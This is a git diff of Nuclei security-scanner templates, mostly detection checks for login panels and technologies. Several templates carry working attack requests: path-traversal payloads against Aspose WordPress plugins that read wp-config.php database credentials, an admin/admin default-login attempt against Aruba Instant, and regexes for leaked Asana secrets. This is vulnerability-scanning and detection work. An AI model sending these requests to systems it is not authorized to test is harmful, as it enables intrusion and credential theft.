a/nuclei-templates/Other/arcserve-panel.yaml +++ b/nuclei-templates/Other/arcserve-panel.yaml @@ -7,13 +7,15 @@ info: reference: - https://twitter.com/HunterMapping/status/1674267368359444480 - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe + classification: + cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: - verified: true + fofa-query: icon_hash="-1889244460" max-request: 1 - vendor: arcserve product: udp shodan-query: http.favicon.hash:-1889244460 - fofa-query: icon_hash="-1889244460" + vendor: arcserve + verified: true tags: panel,login,arcserve,detect http: @@ -33,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200c051923727ed4da25e5bb9062d24632112820760cc42ace377ab172ed66637f02206821597d73341a322e57831efb558156fb2fa2c02c4dc0c70ac23b3a80c99061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1e920029ab223d47552ebb51dbe68e974dd8b2d064b34d4c511819d6ef5d04d022100f04b08386868b3f6308d464cf43873c86fe31c3302d64bb19cd4967ccbcf9037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ares-rat-c2.yaml b/nuclei-templates/Other/ares-rat-c2.yaml index 8ca7ebdf52..71aa6b7939 100644 --- a/nuclei-templates/Other/ares-rat-c2.yaml +++ b/nuclei-templates/Other/ares-rat-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: - verified: true max-request: 1 shodan-query: product:'Ares RAT C2' + verified: true tags: c2,ir,osint,ares,panel,rat http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a7e63617d7be81cd8f853fe522d84270bb42a7121463df540c249d80b7eca79022100fd4678816bee7837766b5a4fa98fe1538e8cccfc6e3f9a2d1fbae1e337e94694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009f391bde1caab637dadd216cedd223a7fcec59ffb58278a87a7a5c88e89f3844022100ad24450fff2f2fcc52d87582f0159aa5ca5f4e3694ffc3f6c63918444eb7d2d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/argo_cd.yaml b/nuclei-templates/Other/argo_cd.yaml new file mode 100644 index 0000000000..12fcda28d3 --- /dev/null +++ b/nuclei-templates/Other/argo_cd.yaml @@ -0,0 +1,20 @@ +id: argo_cd +info: + name: argo_cd + author: cn-kali-team + tags: detect,tech,argo_cd + severity: info + metadata: + product: argo_cd + shodan-query: + - html:"argo cd" + vendor: argoproj + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - argo cd diff --git a/nuclei-templates/Other/argocd-login-534.yaml b/nuclei-templates/Other/argocd-login-534.yaml new file mode 100644 index 0000000000..07b34bdba3 --- /dev/null +++ b/nuclei-templates/Other/argocd-login-534.yaml @@ -0,0 +1,19 @@ +id: argocd-detect + +info: + name: Argo CD Detect + author: Adam Crosser + severity: info + description: Detects the Argo CD website console + tags: tech,argocd + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - 'Argo CD' \ No newline at end of file diff --git a/nuclei-templates/Other/argocd-login.yaml b/nuclei-templates/Other/argocd-login.yaml deleted file mode 100644 index 546bbfd8cc..0000000000 --- a/nuclei-templates/Other/argocd-login.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: argocd-detect - -info: - name: Argo CD Login Panel - author: Adam Crosser,daffainfo - severity: info - description: An Argo CD login panel was discovered. - reference: - - https://argoproj.github.io/cd/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Argo CD" - tags: panel,argocd,login,kubernetes - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<title>Argo CD' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arkei-malware.yaml b/nuclei-templates/Other/arkei-malware.yaml index aedc5ee182..3d74fd6ab3 100644 --- a/nuclei-templates/Other/arkei-malware.yaml +++ b/nuclei-templates/Other/arkei-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Arkei.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,6 @@ file: - '/server/grubConfig' - '\\files\\' - 'SQLite' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a004730450220521d19ffdc72c12b2e9464f1214ef06c4d2b714414ed036d576636a2bfcb8455022100a6fcba94907d58d6ebf858c11440ccc232b30a950ddb1a3bed2eacebeac1e8e8:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/arl-default-login-537.yaml b/nuclei-templates/Other/arl-default-login-537.yaml index f5dcf2d27b..a7c16e40a9 100644 --- a/nuclei-templates/Other/arl-default-login-537.yaml +++ b/nuclei-templates/Other/arl-default-login-537.yaml @@ -1,14 +1,9 @@ id: arl-default-login info: - name: ARL Default Admin Login + name: ARL Default Login author: pikpikcu severity: high - description: An ARL default admin login was discovered. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: arl,default-login requests: @@ -40,5 +35,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/arris-modem-detect.yaml b/nuclei-templates/Other/arris-modem-detect.yaml index 3a9307fcde..85b31d31f7 100644 --- a/nuclei-templates/Other/arris-modem-detect.yaml +++ b/nuclei-templates/Other/arris-modem-detect.yaml @@ -7,14 +7,17 @@ info: description: ARRIS Touchstone Telephony Modem status panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:h:commscope:dg3450:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: dg3450 shodan-query: html:"phy.htm" - tags: panel,arris + vendor: commscope + verified: true + tags: panel,arris,commscope -requests: +http: - method: GET path: - "{{BaseURL}}/phy.htm" @@ -29,5 +32,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4a0a00473045022100dccbca94cbd8601eaf684ba7e8cd9a3c023eb761b8124e6c5491cb03d400e8c402202be17f19304f05c61e103be475a92d1aebf706122dc68b89bfb612b0edadccd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/artica-web-proxy-detect-544.yaml b/nuclei-templates/Other/artica-web-proxy-detect.yaml similarity index 100% rename from nuclei-templates/Other/artica-web-proxy-detect-544.yaml rename to nuclei-templates/Other/artica-web-proxy-detect.yaml diff --git a/nuclei-templates/Other/artifactory-anonymous-deploy.yaml b/nuclei-templates/Other/artifactory-anonymous-deploy.yaml deleted file mode 100644 index 94b3e00db4..0000000000 --- a/nuclei-templates/Other/artifactory-anonymous-deploy.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: artifactory-anonymous-deploy - -info: - name: Artifactory anonymous deploy - author: panch0r3d - severity: high - reference: - - https://www.errno.fr/artifactory/Attacking_Artifactory.html - tags: artifactory - -requests: - - method: GET - path: - - "{{BaseURL}}/artifactory/ui/repodata?deploy=true" - - matchers-condition: and - matchers: - - type: word - words: - - '"repoKey"' - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header \ No newline at end of file diff --git a/nuclei-templates/Other/artifactory_deploy.yaml b/nuclei-templates/Other/artifactory_deploy.yaml new file mode 100644 index 0000000000..04c60207c7 --- /dev/null +++ b/nuclei-templates/Other/artifactory_deploy.yaml @@ -0,0 +1,24 @@ +id: artifactory-anonymous-deploy +info: + name: Artifactory anonymous deploy + reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html + author: panch0r3d + severity: high + tags: artifactory +requests: + - method: GET + path: + - "{{BaseURL}}/artifactory/ui/repodata?deploy=true" + matchers-condition: and + matchers: + - type: word + words: + - '"repoKey"' + part: body + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header diff --git a/nuclei-templates/Other/aruba-instant-default-login.yaml b/nuclei-templates/Other/aruba-instant-default-login.yaml index 0f317319bf..55b9e832cc 100644 --- a/nuclei-templates/Other/aruba-instant-default-login.yaml +++ b/nuclei-templates/Other/aruba-instant-default-login.yaml @@ -1,14 +1,18 @@ id: aruba-instant-default-login info: - name: Aruba Instant password vulnerability + name: Aruba Instant - Default Login author: SleepingBag945 - severity: medium + severity: high description: | - Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
+ Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions. + reference: + - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router. metadata: + verified: true + max-request: 1 fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" - tags: default Password + tags: aruba,default-login http: - raw: @@ -17,11 +21,20 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - opcode=login&user=admin&passwd=admin&refresh=false&nocache=0.17699820340903838 - + opcode=login&user={{username}}&passwd={{password}}&refresh=false&nocache=0.17699820340903838 + attack: pitchfork + payloads: + username: + - admin + password: + - admin + host-redirects: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && contains(body_1,"sid") && contains(body_1,"Admin")' + - 'status_code_1 == 200' + - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")' condition: and + +# digest: 4a0a00473045022100ced4e051d16f58cbefe47b2e6d4acfb6f917418ea7694c5248d757815146178f02200e8ff5e2a45e4224bf56d9e4d5a2bb7ec6ea6c15cbf45fcdaf10431d404c9481:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aruba_instant.yaml b/nuclei-templates/Other/aruba_instant.yaml new file mode 100644 index 0000000000..ae33adf333 --- /dev/null +++ b/nuclei-templates/Other/aruba_instant.yaml @@ -0,0 +1,21 @@ +id: aruba_instant +info: + name: aruba_instant + author: cn-kali-team + tags: detect,tech,aruba_instant + severity: info + metadata: + fofa-query: + - body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" + product: aruba_instant + vendor: arubanetworks + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - jscripts/third_party/highcharts.src.js + - jscripts/third_party/raphael-treemap.min.js diff --git a/nuclei-templates/Other/asana-clientid.yaml b/nuclei-templates/Other/asana-clientid.yaml index 62c4909718..bacc30cfb2 100644 --- a/nuclei-templates/Other/asana-clientid.yaml +++ b/nuclei-templates/Other/asana-clientid.yaml @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 4a0a00473045022100ee80a7c2a35b34bc0d48c69c1e26169ef5a2181505d3836e47974bc04e41fbde0220796c13e9c14005e438971b5e1aa2f241fb1a2736a98df48c1acc98e50b1562b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/asana-clientsecret.yaml b/nuclei-templates/Other/asana-clientsecret.yaml index fa63975189..fed08ffdf1 100644 --- a/nuclei-templates/Other/asana-clientsecret.yaml +++ b/nuclei-templates/Other/asana-clientsecret.yaml @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 4b0a00483046022100a61527e5da6fb4b6f5e194679ac675364422d0a7a09fef2ed10c8d3982694d55022100a24d80c553e4d28e07ce752f5ab161faff53f39ea00a37ea4872f3c8564c4f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/asanhamayesh-cms-lfi.yaml b/nuclei-templates/Other/asanhamayesh-cms-lfi.yaml index 18961552cf..6d47e566f9 100644 --- a/nuclei-templates/Other/asanhamayesh-cms-lfi.yaml +++ b/nuclei-templates/Other/asanhamayesh-cms-lfi.yaml @@ -2,7 +2,7 @@ id: asanhamayesh-cms-lfi info: name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability - author: 0x_Akoko + author: imhunterand severity: high reference: https://cxsecurity.com/issue/WLB-2018030006 tags: asanhamayesh,lfi diff --git a/nuclei-templates/Other/asanhamayesh-lfi-553.yaml b/nuclei-templates/Other/asanhamayesh-lfi-552.yaml similarity index 100% rename from nuclei-templates/Other/asanhamayesh-lfi-553.yaml rename to nuclei-templates/Other/asanhamayesh-lfi-552.yaml diff --git a/nuclei-templates/Other/aspcms-backend-panel.yaml b/nuclei-templates/Other/aspcms-backend-panel.yaml index 4afdfd3479..81821166f4 100644 --- a/nuclei-templates/Other/aspcms-backend-panel.yaml +++ b/nuclei-templates/Other/aspcms-backend-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json metadata: - verified: true - max-request: 2 fofa-query: app="ASPCMS" + max-request: 2 + verified: true tags: panel,login,aspcms,admin http: @@ -36,5 +36,4 @@ http: - 'status_code_1 == 200 && contains(body_1,"alert(")' - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")' condition: and - -# digest: 4a0a0047304502202debdad65506ec15af6fee39811c3fd109cb9f35281bf2cb14d54177fb365814022100dd19eedb73707d20b90846da9a403691acb6f675f896bef496d64ddaa2746803:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e039d5a7adae4d72297ac42094fd0ef69bf43894b8e392c474c653a8ba5f09110220163fad65f1b2a8d7040ca2d3816646e2cd5ca043cdd6b6f52bcd745a5901750d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aspect-control-panel.yaml b/nuclei-templates/Other/aspect-control-panel.yaml index c756fc3181..1ca2d40872 100644 --- a/nuclei-templates/Other/aspect-control-panel.yaml +++ b/nuclei-templates/Other/aspect-control-panel.yaml @@ -8,12 +8,11 @@ info: ASPECT Control Panel login was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.favicon.hash:1011076161 + verified: true tags: panel,aspect,login http: @@ -30,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022063319d61f78c901d63d84b0e550bafea9ab51b6ee1ee2a91d1b18648eac6077b02201728432bf7ad901f9a3ce1a60e2a51d7572b447bfb6b3046be4a662625c067ce:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022003b01b7a0cb3aea69d9387f0308471dc8631a24f86d76679f6b2534af32eb3d0022100a89383c9692a2869bd83300f5e97a97fadf8d6b6f1c3e6e5acedef11e8beb997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aspnet-version-detect.yaml b/nuclei-templates/Other/aspnet-version-detect.yaml index 58114b8031..0f42a05f22 100644 --- a/nuclei-templates/Other/aspnet-version-detect.yaml +++ b/nuclei-templates/Other/aspnet-version-detect.yaml @@ -33,4 +33,4 @@ http: - type: kval kval: - X_AspNet_Version -# digest: 4a0a00473045022100d63d95b999554a10626167cbbe5ad1077e9eeb67d2add6d4afb57a6000527fbc022017389e7f0eaa2599a9dff5531d544530788a80aec345d55c35aa4cd356bc20de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dad22bf762e3dc46dba882804cdf41b02014fea00fe0a951845acbe6c3d138490221008ea9e3a1a77a748ef7e6fc1ef736795b1afc129d64c5751d9733f3734b48682c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aspnetmvc-version-disclosure.yaml b/nuclei-templates/Other/aspnetmvc-version-disclosure.yaml index e106673d3c..c27434415e 100644 --- a/nuclei-templates/Other/aspnetmvc-version-disclosure.yaml +++ b/nuclei-templates/Other/aspnetmvc-version-disclosure.yaml @@ -33,4 +33,4 @@ http: - type: kval kval: - X_AspNetMvc_Version -# digest: 490a00463044022067965e7ff608df90cb8773f5b2df33eee6c179cddc2a207b4af3deab60dc69c5022038fd20ae3487013935ad4c96ab367eaa9f2e4216074c1be8118bb428ebdaa867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100986dc4e365cf66a44c9321b637566896ddb7b44b2fef780afa49a36298679a0902206407bdf1e8076b79feac79addc0a2817fe5c4fd1699238c79459e20708c9f13f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aspose-file-download-561.yaml b/nuclei-templates/Other/aspose-file-download-561.yaml new file mode 100644 index 0000000000..961f6980ff --- /dev/null +++ b/nuclei-templates/Other/aspose-file-download-561.yaml @@ -0,0 +1,24 @@ +id: aspose-file-download +info: + name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability. + reference: + - https://wpscan.com/vulnerability/7866 + tags: wordpress,wp-plugin,lfi,aspose,ebook +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-file-download.yaml b/nuclei-templates/Other/aspose-file-download.yaml deleted file mode 100644 index f6b3f7b609..0000000000 --- a/nuclei-templates/Other/aspose-file-download.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: aspose-file-download - -info: - name: Aspose Cloud eBook Generator - File Download - author: 0x_Akoko - severity: high - description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. - reference: https://wpscan.com/vulnerability/7866 - tags: wordpress,wp-plugin,lfi,aspose,ebook - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download-562.yaml b/nuclei-templates/Other/aspose-ie-file-download-562.yaml deleted file mode 100644 index 936207f3e6..0000000000 --- a/nuclei-templates/Other/aspose-ie-file-download-562.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aspose-ie-file-download -info: - name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download - author: 0x_Akoko - severity: high - description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. - reference: - - https://packetstormsecurity.com/files/131162/ - - https://wordpress.org/plugins/aspose-importer-exporter - tags: wordpress,wp-plugin,lfi,aspose -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download-565.yaml b/nuclei-templates/Other/aspose-ie-file-download-565.yaml new file mode 100644 index 0000000000..095211f5e4 --- /dev/null +++ b/nuclei-templates/Other/aspose-ie-file-download-565.yaml @@ -0,0 +1,29 @@ +id: aspose-ie-file-download + +info: + name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + author: 0x_Akoko + severity: high + description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://packetstormsecurity.com/files/131162/ + - https://wordpress.org/plugins/aspose-importer-exporter + tags: wordpress,wp-plugin,lfi,aspose + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-importer-exporter-file-download.yaml b/nuclei-templates/Other/aspose-importer-exporter-file-download.yaml index 0216e21bf1..f252bcf8df 100644 --- a/nuclei-templates/Other/aspose-importer-exporter-file-download.yaml +++ b/nuclei-templates/Other/aspose-importer-exporter-file-download.yaml @@ -2,7 +2,7 @@ id: aspose-importer-exporter-file-download info: name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download - author: 0x_Akoko + author: imhunterand severity: high description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. reference: diff --git a/nuclei-templates/Other/aspose-pdf-file-download-568.yaml b/nuclei-templates/Other/aspose-pdf-file-download-568.yaml new file mode 100644 index 0000000000..b6062673c9 --- /dev/null +++ b/nuclei-templates/Other/aspose-pdf-file-download-568.yaml @@ -0,0 +1,25 @@ +id: aspose-pdf-file-download +info: + name: WordPress Aspose PDF Exporter File Download + author: 0x_Akoko + severity: high + description: The Aspose.psf Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://packetstormsecurity.com/files/131161 + - https://wordpress.org/plugins/aspose-pdf-exporter + tags: wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-pdf-file-download.yaml b/nuclei-templates/Other/aspose-pdf-file-download.yaml deleted file mode 100644 index d10395f6c7..0000000000 --- a/nuclei-templates/Other/aspose-pdf-file-download.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: aspose-pdf-file-download - -info: - name: WordPress Aspose PDF Exporter - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Aspose PDF Exporter is vulnerable to local file inclusion. - reference: - - https://packetstormsecurity.com/files/131161 - - https://wordpress.org/plugins/aspose-pdf-exporter - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,aspose - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aspose-words-exporter-file-download.yaml b/nuclei-templates/Other/aspose-words-exporter-file-download.yaml index f75904a727..f1026466a4 100644 --- a/nuclei-templates/Other/aspose-words-exporter-file-download.yaml +++ b/nuclei-templates/Other/aspose-words-exporter-file-download.yaml @@ -2,7 +2,7 @@ id: aspose-words-exporter-file-download info: name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download - author: 0x_Akoko + author: imhunterand severity: high tags: wordpress,wp-plugin,lfi,wp reference: https://wpscan.com/vulnerability/7869 diff --git a/nuclei-templates/Other/aspose-words-file-download-571.yaml b/nuclei-templates/Other/aspose-words-file-download-571.yaml new file mode 100644 index 0000000000..d881e787a8 --- /dev/null +++ b/nuclei-templates/Other/aspose-words-file-download-571.yaml @@ -0,0 +1,25 @@ +id: aspose-words-file-download +info: + name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. + reference: + - https://wpscan.com/vulnerability/7869 + - https://wordpress.org/plugins/aspose-doc-exporter + tags: wordpress,wp-plugin,lfi,aspose +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-words-file-download-572.yaml b/nuclei-templates/Other/aspose-words-file-download-572.yaml deleted file mode 100644 index 78a79b554e..0000000000 --- a/nuclei-templates/Other/aspose-words-file-download-572.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: aspose-words-file-download - -info: - name: WordPress Aspose Words Exporter <2.0 - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Aspose Words Exporter prior to version 2.0 is vulnerable to local file inclusion. - reference: - - https://wpscan.com/vulnerability/7869 - - https://wordpress.org/plugins/aspose-doc-exporter - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,aspose - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aspx-debug-mode-577.yaml b/nuclei-templates/Other/aspx-debug-mode-577.yaml new file mode 100644 index 0000000000..1879d55864 --- /dev/null +++ b/nuclei-templates/Other/aspx-debug-mode-577.yaml @@ -0,0 +1,33 @@ +id: aspx-debug-mode + +info: + name: ASP.NET Debugging Enabled + author: dhiyaneshDk + severity: info + reference: https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled + tags: debug + +requests: + - raw: + - | + DEBUG /Foobar-debug.aspx HTTP/1.1 + Host: {{Hostname}} + Command: stop-debug + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'OK' + part: body + - type: word + words: + - 'Content-Length: 2' + part: header diff --git a/nuclei-templates/Other/aspx-debug-mode-578.yaml b/nuclei-templates/Other/aspx-debug-mode-578.yaml deleted file mode 100644 index 50a5ae5cbd..0000000000 --- a/nuclei-templates/Other/aspx-debug-mode-578.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: aspx-debug-mode - -info: - name: ASP.NET Debugging Enabled - author: dhiyaneshDk - severity: info - reference: - - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled - tags: debug - -requests: - - raw: - - | - DEBUG /Foobar-debug.aspx HTTP/1.1 - Host: {{Hostname}} - Command: stop-debug - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Length: 2 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'OK' - part: body - - type: word - words: - - 'Content-Length: 2' - part: header diff --git a/nuclei-templates/Other/astra-sites.yaml b/nuclei-templates/Other/astra-sites.yaml index cc711b197f..116e0c420a 100644 --- a/nuclei-templates/Other/astra-sites.yaml +++ b/nuclei-templates/Other/astra-sites.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/astra-widgets.yaml b/nuclei-templates/Other/astra-widgets.yaml index f8cd0a8b15..dc4703ef8d 100644 --- a/nuclei-templates/Other/astra-widgets.yaml +++ b/nuclei-templates/Other/astra-widgets.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/asus-aicloud-panel.yaml b/nuclei-templates/Other/asus-aicloud-panel.yaml index baefc1809e..035b14eb56 100644 --- a/nuclei-templates/Other/asus-aicloud-panel.yaml +++ b/nuclei-templates/Other/asus-aicloud-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.asus.com/in/content/aicloud/ metadata: - verified: "true" max-request: 1 shodan-query: title:"AiCloud" + verified: "true" tags: panel,asus,aicloud,detect http: @@ -30,5 +30,4 @@ http: - 200 - 401 condition: or - -# digest: 4a0a0047304502206b920912bfdce6a5b01db3e340f9957c69a5421e041f9881b36ab8d75b6b7e14022100a5f6ce8d57c2d258e0b9d5045b6d62192cdef39b5a77e4d37cc8556b84006f20:922c64590222798bb761d5b6d8e72950 +# digest: 